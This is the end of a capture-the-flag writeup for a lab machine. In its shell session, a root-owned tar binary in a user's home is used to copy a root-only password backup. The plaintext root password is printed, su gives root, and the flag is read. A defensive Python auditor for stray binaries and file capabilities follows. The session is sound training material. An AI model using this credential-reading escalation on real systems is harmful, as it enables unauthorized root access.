-rw------- 1 root root 17 Oct 20 2021 .old_pass.bak
cyber@breakout:~$ ls -l
ls -l
total 1272
-rw-r--r-- 1 cyber cyber 765823 May 26 00:40 linpeas.sh
-rwxr-xr-x 1 root root 531928 Oct 19 2021 tar
-rw-r--r-- 1 cyber cyber 48 Oct 19 2021 user.txt
cyber@breakout:~$ ./tar -cf pass.tar /var/backups/.old_pass.bak
./tar -cf pass.tar /var/backups/.old_pass.bak
./tar: Removing leading `/' from member names
cyber@breakout:~$ ls
ls
linpeas.sh pass.tar tar user.txt
cyber@breakout:~$ tar -xf pass.tar
tar -xf pass.tar
cyber@breakout:~$ ls
ls
linpeas.sh pass.tar tar user.txt var
cyber@breakout:~$ cd var
cd var
cyber@breakout:~/var$ ls
ls
backups
cyber@breakout:~/var$ cd backups
cd backups
cyber@breakout:~/var/backups$ ls
ls
cyber@breakout:~/var/backups$ ls -la
ls -la
total 12
drwxr-xr-x 2 cyber cyber 4096 May 26 04:16 .
drwxr-xr-x 3 cyber cyber 4096 May 26 04:16 ..
-rw------- 1 cyber cyber 17 Oct 20 2021 .old_pass.bak
cyber@breakout:~/var/backups$ cat .old_pass.bak
cat .old_pass.bak
Ts&4&YurgtRX(=~h
cyber@breakout:~/var/backups$ su
su
Password: Ts&4&YurgtRX(=~h
root@breakout:/home/cyber/var/backups# id
id
uid=0(root) gid=0(root) groups=0(root)
root@breakout:/home/cyber/var/backups# cd ../
cd ../
root@breakout:/home/cyber/var# cd
cd
root@breakout:~# ls
ls
rOOt.txt
root@breakout:~# cat rOOt.txt
cat rOOt.txt
3mp!r3{You_Manage_To_BreakOut_From_My_System_Congratulation}
Author: Icex64 & Empire Cybersecurity
root@breakout:~#
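The session above reads a mode 0600 root-owned file through a root-owned copy of tar that has no setuid bit, so the extra privilege must come from somewhere other than the file mode; a file capability on the binary is the usual mechanism for that, though the writeup does not show it. As an added example (not code from the writeup), the Python below audits home directories for executables owned by someone other than the home's user and parses `getcap -r` output for capabilities that bypass permission checks. The getcap sample lines are constructed; the capability names are real.

```python
# Added example, not part of the original writeup: audit user home directories
# for the pattern seen on this box (a root-owned binary dropped in an
# unprivileged user's home) and parse getcap output for risky file capabilities.
import os
import stat
from dataclasses import dataclass
from typing import List, Optional

# Capabilities that let a binary read or write files regardless of mode bits,
# or change identity; any of these on a user-reachable binary needs review.
DANGEROUS_CAPS = {
    "cap_dac_read_search", "cap_dac_override",
    "cap_setuid", "cap_setgid", "cap_sys_admin",
}


@dataclass
class Finding:
    path: str
    reason: str


def classify_entry(path: str, owner_uid: int, mode: int, home_uid: int) -> Optional[Finding]:
    """Flag an executable that lives in a home directory but is not owned by that user."""
    if not stat.S_ISREG(mode):
        return None
    if not mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH):
        return None
    if owner_uid == home_uid:
        return None
    if mode & stat.S_ISUID:
        return Finding(path, f"setuid executable owned by uid {owner_uid} inside home of uid {home_uid}")
    if owner_uid == 0:
        return Finding(path, f"root-owned executable inside home of uid {home_uid}")
    return Finding(path, f"executable owned by foreign uid {owner_uid} inside home of uid {home_uid}")


def scan_homes(base: str = "/home") -> List[Finding]:
    """Walk every directory under base and apply classify_entry with real stat data."""
    findings: List[Finding] = []
    for home in os.scandir(base):
        if not home.is_dir(follow_symlinks=False):
            continue
        home_uid = home.stat(follow_symlinks=False).st_uid
        for dirpath, _, filenames in os.walk(home.path):
            for name in filenames:
                full = os.path.join(dirpath, name)
                st = os.lstat(full)
                hit = classify_entry(full, st.st_uid, st.st_mode, home_uid)
                if hit:
                    findings.append(hit)
    return findings


def parse_getcap(output: str) -> List[Finding]:
    """Parse `getcap -r <dir>` output in both the old `path = caps+ep`
    and the newer `path caps=ep` formats, flagging dangerous capabilities."""
    findings: List[Finding] = []
    for line in output.splitlines():
        line = line.strip()
        if not line:
            continue
        if " = " in line:
            path, caps = line.split(" = ", 1)
        else:
            path, _, caps = line.rpartition(" ")
        # "cap_a,cap_b=ep" or "cap_a,cap_b+ep": strip the flag suffix from each name
        names = {c.split("=")[0].split("+")[0].strip() for c in caps.split(",")}
        hits = sorted(names & DANGEROUS_CAPS)
        if hits:
            findings.append(Finding(path, "file capability " + ",".join(hits)))
    return findings


# Constructed sample of getcap output; the paths and capabilities are illustrative.
SAMPLE_GETCAP = """\
/home/cyber/tar cap_dac_read_search=ep
/usr/bin/ping cap_net_raw=ep
"""

if __name__ == "__main__":
    for f in parse_getcap(SAMPLE_GETCAP):
        print(f.path, "->", f.reason)
    if os.path.isdir("/home"):
        for f in scan_homes("/home"):
            print(f.path, "->", f.reason)
```

On a live host, feed the real output of `getcap -r /home /usr /opt 2>/dev/null` into `parse_getcap`; the ownership check needs no extra tooling and catches the dropped binary even if its capability has been removed.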
From: https://www.cnblogs.com/vuln/p/17709793.html